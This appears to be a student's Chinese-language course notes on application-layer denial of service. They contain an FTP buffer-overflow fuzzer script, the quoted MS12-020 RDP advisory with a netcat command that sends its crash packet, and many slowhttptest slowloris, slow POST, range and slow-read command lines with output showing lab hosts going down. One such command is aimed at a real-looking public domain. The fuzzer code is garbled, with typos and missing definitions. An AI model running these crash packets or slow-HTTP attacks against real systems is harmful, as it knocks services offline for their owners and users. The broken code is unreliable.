关键词:
应用层Dos 应用服务漏洞 - 服务代码存在漏洞,遇异常提交数据时程序崩溃 - 应用处理大量并发请求能力有限,被拒绝的是应用或OS 缓冲区溢出漏洞 - 向目标函数随机提交数据,特定情况下数据覆盖临近寄存器或内存 - 影响:远程代码执行、Dos - 利用模糊测试方法发现缓冲区溢出漏洞 CesarFTP 0.99 服务漏洞 - ftp_fuzz.py #MKD/RMD Ms12-020远程桌面协议Dos漏洞 |
[email protected]:~# cp /media/sf_D_DRIVE/ftp_fuzz* .
[email protected]:~# ls
Desktop Downloads ftp_fuzz.py hs_err_pid2077.log Pictures Templates
Documents ftp_fuzz1.py hs_err-pid1982.log Music Public Videos
-----------------------------------------------------------------------------------
[ftp_fuzz.py]
#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket
import sys
if len(sys.argv) != 6:
print "用法: ./ftp_fuzz.py [目标IP] [目标端口] [载荷] [步长] [最大长度]"
print "举例:./ftp_fuzz.py 1.1.1.1 21 A 100 1000"
ip = str(sys.argv[1])
port = int(sys.argv[2])
char = sys.argv[3]
i = int(sys.argv[4]
step = int(sys.argv[4])
user = raw_input(str("FTP账号: "))
passwd = raw_input(str("FTP密码: "))
command = raw_input(str("FTP命令: "))
while i <= max:
try:
payload = command + " " + (char * i)
print "已发送" + str(i) + "个 (" + char + ")"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((ip,port))
s.recv(2014)
s.send(‘USER‘ + user + ‘ ‘)
s.recv(2014)
s.send(‘PASS‘ + passwd + ‘ ‘)
s.recv(2014)
s.send(payload + ‘ ‘)
s.sned(‘QUIT ‘)
s.recv(2014)
s.close()
i = i + step
except:
pirnt " 服务已崩溃"
sys.exit()
print " 未发现缓冲区溢出漏洞"
-----------------------------------------------------------------------------------
[email protected]:~# ./ftp_fuzz.py
用法: ./ftp_fuzz.py [目标IP] [目标端口] [载荷] [步长] [最大长度]
举例:./ftp_fuzz.py 1.1.1.1 21 A 100 1000
[email protected]:~# ./ftp_fuzz.py 192.168.1.127 21 A 100 2000
FTP账号:anonymous
FTP密码:
FTP命令:PWD
已发送100 个 (A)
已发送200 个 (A)
已发送300 个 (A)
已发送400 个 (A)
已发送500 个 (A)
已发送600 个 (A)
已发送700 个 (A)
已发送800 个 (A)
已发送900 个 (A)
已发送1000 个 (A)
已发送1100 个 (A)
已发送1200 个 (A)
已发送1300 个 (A)
已发送1400 个 (A)
已发送1500 个 (A)
已发送1600 个 (A)
已发送1700 个 (A)
已发送1800 个 (A)
服务已崩溃
[email protected]:~# ./ftp_fuzz.py192.168.1.127 21 A 100 2000
FTP账号:anonymous
FTP密码:
FTP命令:MKD
已发送100 个 (A)
已发送200 个 (A)
已发送300 个 (A)
已发送400 个 (A)
已发送500 个 (A)
已发送600 个 (A)
已发送700 个 (A)
已发送800 个 (A)
已发送900 个 (A)
已发送1000 个 (A)
已发送1100 个 (A)
已发送1200 个 (A)
已发送1300 个 (A)
已发送1400 个 (A)
已发送1500 个 (A)
已发送1600 个 (A)
已发送1700 个 (A)
已发送1800 个 (A)
已发送1900 个 (A)
已发送2000 个 (A)
未发现缓冲区溢出漏洞
[email protected]:~# ./ftp_fuzz.py192.168.1.127 21 ABCD 100 2000
FTP账号:anonymous
FTP密码:
FTP命令:RMD
已发送100 个 (A)
已发送200 个 (A)
已发送300 个 (A)
已发送400 个 (A)
已发送500 个 (A)
已发送600 个 (A)
已发送700 个 (A)
服务已崩溃
两次测试都没有生效,可以登录ftp服务!
-----------------------------------------------------------------------------------
[ftp_fuzz1.py]
#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket
import sys
if len(sys.argv) != 6:
print "用法: ./ftp_fuzz.py [目标IP] [目标端口] [载荷] [步长] [最大长度]"
print "举例:./ftp_fuzz.py 1.1.1.1 21 A 100 1000"
ip = str(sys.argv[1])
port = int(sys.argv[2])
char = sys.argv[3]
i = int(sys.argv[4]
step = int(sys.argv[4])
user = raw_input(str("FTP账号: "))
passwd = raw_input(str("FTP密码: "))
command = raw_input(str("FTP命令: "))
while i <= max:
try:
payload = command + " " + (‘ ‘ * i)
print "已发送" + str(i) + "个换行符"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((ip,port))
s.recv(2014)
s.send(‘USER‘ + user + ‘ ‘)
s.recv(2014)
s.send(‘PASS‘ + passwd + ‘ ‘)
s.recv(2014)
s.send(payload + ‘ ‘)
s.sned(‘QUIT ‘)
s.recv(2014)
s.close()
i = i + step
except:
pirnt " 服务已崩溃"
sys.exit()
print " 未发现缓冲区溢出漏洞"
-----------------------------------------------------------------------------------
[email protected]:~# ./ftp_fuzz.py
用法: ./ftp_fuzz.py [目标IP] [目标端口] [载荷] [步长] [最大长度]
举例:./ftp_fuzz.py 1.1.1.1 21 A 100 1000
[email protected]:~# ./ftp_fuzz.py 192.168.1.127 21 100 1000
FTP账号:anonymous
FTP密码:
FTP命令:MKD
已发送100 个 (A)
已发送200 个 (A)
已发送300 个 (A)
已发送400 个 (A)
已发送500 个 (A)
已发送600 个 (A)
已发送700 个 (A)
服务已崩溃
服务端ftp已经报错了!
[email protected]:~# ./ftp_fuzz.py 192.168.1.127 21 100 1000
FTP账号:anonymous
FTP密码:
FTP命令:RMD
已发送100 个 (A)
已发送200 个 (A)
已发送300 个 (A)
已发送400 个 (A)
已发送500 个 (A)
已发送600 个 (A)
已发送700 个 (A)
服务已崩溃
wirehark
ip.addr==192.168.1.127
[email protected]:~# searchsploit ms12-020
----------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
----------------------------------------------------- ----------------------------------
Microsoft Terminal Services Use After Free (MS12-020 | ./windwos/dos/18606.txt
----------------------------------------------------- ----------------------------------
[email protected]:~# cp /usr/share/exploitdb/platforms/winodws/dos/18606.txt .
[email protected]:~# ls
18606.txt Documents ftp_fuzz1.py hs_err_pid1982.log Music Public videos
Desktop Downloads ftp_fuzz.py hs_err_pid2077.log Pictures Templates
-----------------------------------------------------------------------------------
[email protected]:~# geany 181606.txt
#######################################################################
Luigi Auriemma
Application: Microsoft Terminal Services / Remote Desktop Services
http://www.microsoft.com
http://msdn.microsoft.com/en-us/library/aa383015(v=vs.85).aspx
Versions: any Windows version before 13 Mar 2012
Platforms: Windows
Bug: use after free
Exploitation: remote, versus server
Date: 16 Mar 2012 (found 16 May 2011)
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
Additional references:
http://www.zerodayinitiative.com/advisories/ZDI-12-044/
http://technet.microsoft.com/en-us/security/bulletin/ms12-020
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor‘s homepage:
"The Microsoft Remote Desktop Protocol (RDP) provides remote display
and input capabilities over network connections for Windows-based
applications running on a server. RDP is designed to support different
types of network topologies and multiple LAN protocols."
#######################################################################
======
2) Bug
======
The Remote Desktop Protocol is used by the "Terminal Services / Remote
Desktop Services" and works at kernel level on port 3389.
There is an use-after-free vulnerability located in the handling of the
maxChannelIds field of the T.125 ConnectMCSPDU packet (offset 0x2c of
the provided proof-of-concept) when set to a value minor/equal than 5.
The problem happens during the disconnection of the user started with
RDPWD!NM_Disconnect while the effect of the possible code execution is
visible in termdd!IcaBufferAlloc (or termdd!IcaBufferAllocEx on
Windows 7/2008) after termdd!IcaGetPreviousSdLink returns an invalid
memory pointer, the following dump is taken from Windows 2003 Server:
f761887c 8bff mov edi,edi
f761887e 55 push ebp
f761887f 8bec mov ebp,esp
f7618881 56 push esi
f7618882 57 push edi
f7618883 8b7d08 mov edi,dword ptr [ebp+8]
f7618886 8d47ec lea eax,[edi-14h]
f7618889 50 push eax
f761888a eb09 jmp termdd!IcaBufferAlloc+0x19 (f7618895)
f761888c 8b4618 mov eax,dword ptr [esi+18h] ; we are here
f761888f 833800 cmp dword ptr [eax],0 ; or here
f7618892 7527 jne termdd!IcaBufferAlloc+0x3f (f76188bb) ; must jump
f7618894 56 push esi
f7618895 e878290000 call termdd!IcaGetPreviousSdLink (f761b212) ; the new ESI is returned by this function
f761889a 8bf0 mov esi,eax
f761889c 85f6 test esi,esi
f761889e 75ec jne termdd!IcaBufferAlloc+0x10 (f761888c)
f76188a0 ff751c push dword ptr [ebp+1Ch]
f76188a3 ff7518 push dword ptr [ebp+18h]
f76188a6 ff7514 push dword ptr [ebp+14h]
f76188a9 ff7510 push dword ptr [ebp+10h]
f76188ac ff750c push dword ptr [ebp+0Ch]
f76188af 57 push edi
f76188b0 e8b9fcffff call termdd!IcaBufferAllocInternal (f761856e)
f76188b5 5f pop edi
f76188b6 5e pop esi
f76188b7 5d pop ebp
f76188b8 c21800 ret 18h
f76188bb 33c0 xor eax,eax
f76188bd 53 push ebx
f76188be 8d7e10 lea edi,[esi+10h]
f76188c1 40 inc eax
f76188c2 f00fc107 lock xadd dword ptr [edi],eax
f76188c6 ff751c push dword ptr [ebp+1Ch]
f76188c9 8b4618 mov eax,dword ptr [esi+18h] ; the same value of before
f76188cc ff7518 push dword ptr [ebp+18h]
f76188cf ff7514 push dword ptr [ebp+14h]
f76188d2 ff7510 push dword ptr [ebp+10h]
f76188d5 ff750c push dword ptr [ebp+0Ch]
f76188d8 ff761c push dword ptr [esi+1Ch]
f76188db ff10 call dword ptr [eax] ; code execution
f76188dd 8bd8 mov ebx,eax
f76188df 83c8ff or eax,0FFFFFFFFh
f76188e2 f00fc107 lock xadd dword ptr [edi],eax
f76188e6 7506 jne termdd!IcaBufferAlloc+0x72 (f76188ee)
f76188e8 56 push esi
f76188e9 e8382f0000 call termdd!_IcaUnloadSd (f761b826)
f76188ee 8bc3 mov eax,ebx
f76188f0 5b pop ebx
f76188f1 ebc2 jmp termdd!IcaBufferAlloc+0x39 (f76188b5)
eax=040b0402 ebx=e1492090 ecx=00390080 edx=00000003 esi=040b0402 edi=e1438240
eip=f762888c esp=b832f9d8 ebp=b832f9e0 iopl=0 nv up ei pl nz na po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202
termdd!IcaBufferAlloc+0x10:
f762888c 8b4618 mov eax,dword ptr [esi+18h] ds:0023:040b041a=????????
ChildEBP RetAddr
b8b399e0 b89c1c34 termdd!IcaBufferAlloc+0x10
b8b39a00 b89c1c67 RDPWD!StackBufferAlloc+0x26
b8b39a2c b89a902c RDPWD!MCSDetachUserRequest+0x29
b8b39a40 b89a8b44 RDPWD!NMDetachUserReq+0x14
b8b39a4c b89a9185 RDPWD!NM_Disconnect+0x16
b8b39a58 b89adcb4 RDPWD!SM_Disconnect+0x27
b8b39a68 b89a906d RDPWD!SM_OnConnected+0x70
b8b39a88 b89a8db4 RDPWD!NMAbortConnect+0x23
b8b39ac0 b89a9d88 RDPWD!NM_Connect+0x86
b8b39ae0 b89abcfc RDPWD!SM_Connect+0x112
b8b39b08 b89ac786 RDPWD!WDWConnect+0x368
b8b39b3c b89a6959 RDPWD!WDWConfConnect+0x94
b8b39b70 f762c1c7 RDPWD!WD_Ioctl+0x1227
b8b39b8c f762c5a3 termdd!_IcaCallSd+0x35
b8b39bac f762ca10 termdd!_IcaCallStack+0x55
b8b39bf4 f762abcc termdd!IcaDeviceControlStack+0x414
b8b39c24 f762ad20 termdd!IcaDeviceControl+0x4e
b8b39c3c 8081d5c3 termdd!IcaDispatch+0x12a
b8b39c50 808ed4eb nt!IofCallDriver+0x45
b8b39c64 808ee28d nt!NtWriteFile+0x2943
b8b39d00 808e6dbc nt!NtWriteFile+0x36e5
b8b39d34 80883968 nt!NtDeviceIoControlFile+0x2a
b8b39d64 7c82847c nt!KeReleaseInStackQueuedSpinLockFromDpcLevel+0xb14
b8b39d68 badb0d00 ntdll!_NLG_Notify+0x14
On Windows 2003 that zone of the memory pointed by ESI+18 using the
provided proof-of-concept is ever in the range 040b02??-040b04??.
The exploitability depends by the possibility of controlling ESI or the
content pointed by it (maybe via a form of heap spraying?), indeed in
my quick tests this zone sometimes is allocated and others it isn‘t.
Note that on the post-Vista Windows versions (like 7 and 2008) "seems"
necessary to have "Allow connections from computers running any version
of Remote Desktop" for being vulnerable.
Anyway I‘m not totally sure about this so-called limitation because it
looks like dependent by my proof-of-concept only.
The provided proof-of-concept uses the BER integer values set at 32bit
(big endian) in case they could be useful for easier debugging.
Additional details about the protocol:
http://msdn.microsoft.com/en-us/library/cc240836%28v=prot.10%29.aspx
#######################################################################
===========
3) The Code
===========
http://aluigi.org/poc/termdd_1.dat
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18606.dat
nc SERVER 3389 < termdd_1.dat
resend it multiple times in case of no results and note that this is
just a simple proof-of-concept packet to quickly test the bug so it‘s
not optimized at all.
#######################################################################
======
4) Fix
======
http://technet.microsoft.com/en-us/security/bulletin/ms12-020
#######################################################################
-----------------------------------------------------------------------------------
[email protected]:~/Downloads# nc 192.168.1.127 3389 < termdd_1.dat
发了五六次之后,就蓝屏重启了
再发一次之后,就直接重启了!
应用层Dos slowhttptest ( 源自google ) - 低宽带应用层慢速Dos攻击(相对于CC等快速攻击而言的慢速) - 最早由Python编写,跨平台支持(Linux、win、Cygwin、OSX) - 尤其擅长攻击apache、tomcat(几乎百发百中) 攻击方法 - Slowloris、Slow HTTP POST攻击 耗尽应用的并发连接池,类似于Http层Syn flood HTTP协议默认在服务器全部接收请求之后才开始处理,若客户端发送速度缓慢或 不完整,服务器始终为其保留连接资源池占用,此类大量并发将导致DoS Slowloris: 完整的http请求结尾是 ,攻击发 ...... Slow POST: HTTP头content-length声明长度,但body部分缓慢发送 |
应用层Dos 攻击方法 - Slow Read attack攻击 与slowloris and slow POST目的相同,都是耗尽应用的并发连接池 不同之处在于请求正常发送,但慢速读取响应数据 攻击者调整TCP window窗口大小,是服务器慢速返回数据 - Apache Range Header attack 客户端传输文件时,体积查过HTTP Body大小限制时进行分段 耗尽服务CPU、内存资源 |
应用层Dos ulimite -n 70000 HTTP Post攻击模式 - slowhttptest -c 1000 -B -g -o body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://1.1.1.1 -x 10 -p 3 slowloris攻击模式 - slowhttptest -c 1000 -H -g -o header_stats -i 10 -r 200 -t GET -u http://1.1.1.1 -x 24 -p 3 支持代理 大量应用服务器和安全设备都无法防护慢速攻击 |
[email protected]:~$ ifconfig
192.168.1.119
[email protected]:~# apt-get install slowhttptest
[email protected]:~# man slowhttptest
SLOWHTTPTEST(1) BSD General Commands Manual SLOWHTTPTEST(1)
NAME
slowhttptest — Denial Of Service attacks simulator
SYNOPSIS
slowhttptest [-H|B|R|X] [-g] [-a range start] [-b range limit]
[-c number of connections]
[-d all traffic directed through HTTP proxy at host:port]
[-e probe traffic directed through HTTP proxy at host:port]
[-i interval in seconds] [-k request multiply factor]
[-l test duration in seconds]
[-n slow read interval in seconds]
[-o output file path and/or name]
[-p timeout for probe connection in seconds]
[-r connection per second]
[-s value of Content-Length header] [-t HTTP verb]
[-u absolute URL] [-v output verbosity level]
[-w advertised window size range start]
[-x max length of follow up data]
[-y advertised window size range end]
[-z slow read from recieve buffer in bytes]
DESCRIPTION
The slowhttptest implements most common low-bandwidth Application Layer
DoS attacks and produces CSV and HTML files with test statistics.
Currently supported attacks are:
· Slowloris
· Slow HTTP POST
· pache Range Header
· Slow Read
The options are as follows:
-g Forces slowhttptest to generate CSV and HTML files when test fin‐
ishes with timestamp in filename.
-H Starts slowhttptest in SlowLoris mode, sending unfinished HTTP
requests.
-B Starts slowhttptest in Slow POST mode, sending unfinished HTTP
message bodies.
-R Starts slowhttptest in Range Header mode, sending malicious Range
Request header data.
-X Starts slowhttptest in Slow Read mode, reading HTTP responses
slowly.
-a start
Sets the start value of range-specifier for Range Header attack.
-b bytes
Sets the limit value of range-specifier for Range Header attack.
-c number of connections
Specifies the target number of connections to establish during
the test.
-d HTTP proxy host:port
Specifies HTTP proxy server to connect to for all connections.
-e HTTP proxy host:port
Specifies HTTP proxy server to connect to for probe connections.
-i seconds
Specifies the interval between follow up data for slowrois and
Slow POST tests.
-k pipeline factor
Specifies number of times the resource would be requested per
socket in Slow Read test.
-l seconds
Specifies test duration in seconds.
-n seconds
Specifies the interval between read operations for Slow Read
test.
-o file name
Specifies custom file name, effective with -g.
-p seconds
Specifies the interval to wait for HTTP response onprobe connec‐
tion, before marking the server as DoSed.
-r connections per second
Specifies the connection rate.
-s bytes
Specifies the value of Content-Length header for Slow POST test.
-t HTTP verb
Specifies the verb to use in HTTP request.
-u URL Specifies the URL.
-v level
Specifies the verbosity level of logging.
-w bytes
Specifies the start of the range the TCP advertised window size
would be picked from in Slow Read test.
-x bytes
Specifies the maximum length of follow up data for slowloris and
Slow POST tests.
-y bytes
Specifies the end of the range the TCP advertised window size
would be picked from in Slow Read test.
-z bytes
Specifies the number of bytes to read from receive buffer with
each read() operation.
EXAMPLES
Start a slowloris test of host.example.com with 1000 connections, statis‐
tics goes into my_header_stats, interval between follow up headers is 10
seconds and connection rate is 200 connections per second:
$ slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET
-u https://host.example.com/index.html -x 24 -p 3
Start slow POST test of host.example.com with 3000 connections, statis‐
tics goes into my_body_stats, interval between follow up headers is 110
seconds, connection rate is 200 connections per second, Content-Length
header value is 8192, maximum length of follow up data is random value
limited by 10 bytes and probe connections waits 3 seconds for HTTP
response before marking server as DoSed:
$ slowhttptest -c 3000 -B -g -o my_body_stats -i 110 -r 200 -s 8192
-t FAKEVERB -u http://host.example.com/loginform.html -x 10 -p 3
Start Range Header test of host.example.com with 1000 connections, use
HEAD verb, and generate HTTP header Range:0-, x-1, x-2, x-3, ... x-y,
where x is 10 and y is 3000, connection rate is 500: interval between
follow up headers is 10 seconds and connection rate is 200 connections
per second:
$ slowhttptest -R -u http://host.example.com/ -t HEAD -c 1000 -a 10
-b 3000 -r 500
Start Slow Read test of host.example.com with 8000 connections, no sta‐
tistics is generated, connection rate is 200 connections per second, TCP
advertised window size is a random value between 512 and 1024,
slowhttptest reads 32 bytes from each connections every 5 seconds, 3
requests are pipelined per each connections, probe connection waits 3
seconds for HTTP response before marking server as DoSed:
$ slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u
https://host.example.com/resources/index.html -p 3
Start Slow Read test of host.example.com through HTTP proxy server at
10.10.0.1:8080 with 8000 connections, no statistics is generated, the
rest test vaules are default. slowhttptest most likely would test HTTP
proxy server itself, rather than target server, but it all depends on the
HTTP proxy server implementation:
$ slowhttptest -d 10.10.0.1:8080 -c 8000 -X -u
https://host.example.com/resources/index.html
Start Slow Read test of host.example.com and direct probe traffic through
HTTP proxy server at 10.10.0.1:8080 with 8000 connections, no statistics
is generated, the rest test vaules are default. Specifying another con‐
nection channel for probe connections helps to make sure that
slowhttptest shows valid statistics for availability of server under
test:
$ slowhttptest -e 10.10.0.1:8080 -c 8000 -X -u
https://host.example.com/resources/index.html
AUTHOR
Sergey Shekyan [email protected] .
Project page http://code.google.com/p/slowhttptest/ .
BSD November 25, 2013 BSD
-----------------------------------------------------------------------------------
[email protected]:~# slowhttptest -c 1000 -H -g -o my_header -i 10 -r 200 -t GET -u http://192.168.1.119 -x 24 -p 3
Mon Jul 4 20:31:43 2016:
Mon Jul 4 20:31:43 2016:
slowhttptest version 1.6
- https://code.google.com/p/slowhttptest/ -
test type: SLOW HEADERS
number of connections: 1000
URL: http://192.168.1.119/
verb: GET
Content-Length header value: 4096
follow up data max size: 52
interval between follow up data: 10 seconds
connections per seconds: 200
probe connection timeout: 3 seconds
test duration: 240 seconds
using proxy: no proxy
Mon Jul 4 20:31:43 2016:
slow HTTP test status on 0th second:
initializing: 0
pending: 1
connected: 0
error: 0
closed: 0
service available: YES
Mon Jul 4 20:31:48 2016:
Mon Jul 4 20:31:48 2016:
slowhttptest version 1.6
- https://code.google.com/p/slowhttptest/ -
test type: SLOW HEADERS
number of connections: 1000
URL: http://192.168.1.119/
verb: GET
Content-Length header value: 4096
follow up data max size: 52
interval between follow up data: 10 seconds
connections per seconds: 200
probe connection timeout: 3 seconds
test duration: 240 seconds
using proxy: no proxy
Mon Jul 4 20:31:48 2016:
slow HTTP test status on 5th second:
initializing: 0
pending: 791
connected: 0
error: 0
closed: 51
service available: NO
Mon Jul 4 20:31:53 2016:
Mon Jul 4 20:31:53 2016:
slowhttptest version 1.6
- https://code.google.com/p/slowhttptest/ -
test type: SLOW HEADERS
number of connections: 1000
URL: http://192.168.1.119/
verb: GET
Content-Length header value: 4096
follow up data max size: 52
interval between follow up data: 10 seconds
connections per seconds: 200
probe connection timeout: 3 seconds
test duration: 240 seconds
using proxy: no proxy
Mon Jul 4 20:31:53 2016:
slow HTTP test status on 10th second:
initializing: 0
pending: 848
connected: 0
error: 0
closed: 152
service available: NO
Mon Jul 4 20:31:54 2016:
Test ended on 11th second
Exit status: Connection refused
CSV report saved to my_header.csv
HTML report saved to my_header.html
[email protected]:~# slowhttptest -c 1000 -H -g -o my_header -i 10 -r 1 -t GET -u http://192.168.1.119 -x 24 -p 3 -l 99999999
Mon Jul 4 20:37:34 2016:
Mon Jul 4 20:37:34 2016:
slowhttptest version 1.6
- https://code.google.com/p/slowhttptest/ -
test type: SLOW HEADERS
number of connections: 1000
URL: http://192.168.1.119/
verb: GET
Content-Length header value: 4096
follow up data max size: 52
interval between follow up data: 10 seconds
connections per seconds: 1
probe connection timeout: 3 seconds
test duration: 240 seconds
using proxy: no proxy
Mon Jul 4 20:37:34 2016:
slow HTTP test status on 0th second:
initializing: 0
pending: 1
connected: 0
error: 0
closed: 0
service available: YES
Mon Jul 4 20:37:40 2016:
Mon Jul 4 20:37:40 2016:
slowhttptest version 1.6
- https://code.google.com/p/slowhttptest/ -
test type: SLOW HEADERS
number of connections: 1000
URL: http://192.168.1.119/
verb: GET
Content-Length header value: 4096
follow up data max size: 52
interval between follow up data: 10 seconds
connections per seconds: 1
probe connection timeout: 3 seconds
test duration: 240 seconds
using proxy: no proxy
Mon Jul 4 20:37:40 2016:
slow HTTP test status on 5th second:
initializing: 0
pending: 4
connected: 0
error: 0
closed: 3
service available: NO
Mon Jul 4 20:37:45 2016:
Mon Jul 4 20:37:45 2016:
slowhttptest version 1.6
- https://code.google.com/p/slowhttptest/ -
test type: SLOW HEADERS
number of connections: 1000
URL: http://192.168.1.119/
verb: GET
Content-Length header value: 4096
follow up data max size: 52
interval between follow up data: 10 seconds
connections per seconds: 1
probe connection timeout: 3 seconds
test duration: 240 seconds
using proxy: no proxy
Mon Jul 4 20:37:45 2016:
slow HTTP test status on 10th second:
initializing: 0
pending: 3
connected: 0
error: 0
closed: 9
service available: NO
Mon Jul 4 20:37:46 2016:
Test ended on 11th second
Exit status: Connection refused
CSV report saved to my_header.csv
HTML report saved to my_header.html
[email protected]:~# cp my_header_stats.html /media/sf_D_DRIVE/
[email protected]:~# slowhttptest -c 3000 -H -g -o my_header_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168.1.119 -x 10 -p 3
[email protected]:~# slowhttptest -c 65539 -H -g -o my_header_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168.1.119 -x 10 -p 3
[email protected]:~# ulimit -a
[email protected]:~# ulimit -a
core file size (blocks, -c) 0
data seg size (kbytes, -d) unlimited
scheduling priority (-e) 0
file size (blocks, -f) unlimited
pending signals (-i) 7846
max locked memory (kbytes, -l) 64
max memory size (kbytes, -m) unlimited
open files (-n) 1024
pipe size (512 bytes, -p) 8
POSIX message queues (bytes, -q) 819200
real-time priority (-r) 0
stack size (kbytes, -s) 8192
cpu time (seconds, -t) unlimited
max user processes (-u) 7846
virtual memory (kbytes, -v) unlimited
file locks (-x) unlimited
[email protected]:~# ulimit - 70000
[email protected]:~# slowhttptest -c 65539 -H -g -o my_header_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168.1.119 -x 10 -p 3
[email protected]:~# slowhttptest -R -u http://192.168.1.119/ -t HEAD -c 65539 -a 10
-b 3000 -r 500
[email protected]:~# slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u https://192.168.1.119 -p 3
[email protected]:~# slowhttptest -c 65539 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168.1.119 -x 10 -p 3
应用层Dos ulimite -n 70000 HTTP Post 攻击模式 - slowhttptest -c 1000 -B -g -o body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://1.1.1.1 -x 10 -p 3 sloworis 攻击模式 - slowhttptest -c 1000 -H -g -o header_stats -i 10 -r 200 -t GET -u http://1.1.1.1 -x 24 -p 3 支持代理 大量应用服务器和安全设备都无法防护慢速攻击 |
wget http://slowhttptest.googlecode.com/files/slowhttptest-1.5.tar.gz 第一条:下载
tar -vxf slowhttptest-1.5.tar.gz 解压
cd slowhttptest-1.5/ 进入目录
./configure 再往下你懂的
make
make install
测试白帽攻击是这样的:
slowhttptest -c 1000 -X -g -o -slow_read_stats -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://www.loveuv.net -p 3
参数:
—a —开始开始值范围说明符用于范围头测试
-b 将字节限制的范围说明符用于范围头测试
- c 的连接数限制为65539
- d proxy host:port 用于指导所有流量通过web代理
- e proxy host:port 端口用于指导只有探针交通通过web代理
- h,B,R或x 指定减缓在头部分或在消息体,- R 允许范围检验,使慢读测试- x
- g 生成统计数据在CSV和HTML格式,模式是缓慢的xxx。csv / html,其中xxx是时间和日期
- i seconds 秒间隔跟踪数据在几秒钟内,每个连接
- k 管道因子次数重复请求在同一连接慢读测试如果服务器支持HTTP管道内衬。
- l 在几秒钟内,秒测试时间
- n 秒间隔从接收缓冲区读取操作
- o 文件定义输出文件路径和/或名称,如果指定有效- g
- p 秒超时等待HTTP响应在探头连接后,服务器被认为是不可访问的
- r seconds 连接速度
- s 字节值的内容长度标题详细说明,如果指定- b
- t verb 自定义
- u URL 目标URL,相同的格式键入浏览器,e。g https://host[:port]/
- v level 冗长等级0 - 4的日志
- w 字节范围广告的窗口大小会选择从
- x 字节最大长度的跟踪数据结束
- y 字节范围广告的窗口大小会选择从
- z 字节从接收缓冲区读取字节与单一的read()操作
还有一类拒绝服务 炸邮箱 - 使用垃圾邮件塞满邮箱 无意识的/非故意的拒绝服务攻击 - 数据库服务器宕机恢复后,引用列队大量请求洪水涌来 - 警告邮件在邮件服务器修改地址后洪水攻击防火墙 |
该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂
Security+认证为什么是互联网+时代最火爆的认证?
牛妹先给大家介绍一下Security+
Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。
通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。
Security+认证如此火爆的原因?
原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。
目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。
原因二: IT运维人员工作与翻身的利器。
在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。
原因三:接地气、国际范儿、考试方便、费用适中!
CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。
在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。
本文出自 “11662938” 博客,请务必保留此出处http://11672938.blog.51cto.com/11662938/1972944
安全牛学习笔记http协议
...广泛采用的FTP、ArchieGopher等是建立在 TCP/IP协议之上的应用层协议,不同的协议对应着不同的应用。HTTP(HyperTextTransferProtocol-超文本传输协议)是一个属于应用层的面向对象的协议, 由于其简捷、快速的方式,适用 查看详情
安全牛学习笔记http特点
1.web页面分类动态web 应用 数据库 根据用户的输入返回不同的结果 静态web2.web攻击面 NetworkOSWEBServerAppserverWebApplicationDatab 查看详情
安全牛学习笔记收集敏感数据隐藏痕迹
收集敏感数据、隐藏痕迹利用配置不当提权 应用系统的配置文件 应用连接数据库的配置文件基本信息收集 Linux /etc/resolv.conf /etc/pa 查看详情
安全牛学习笔记服务扫描
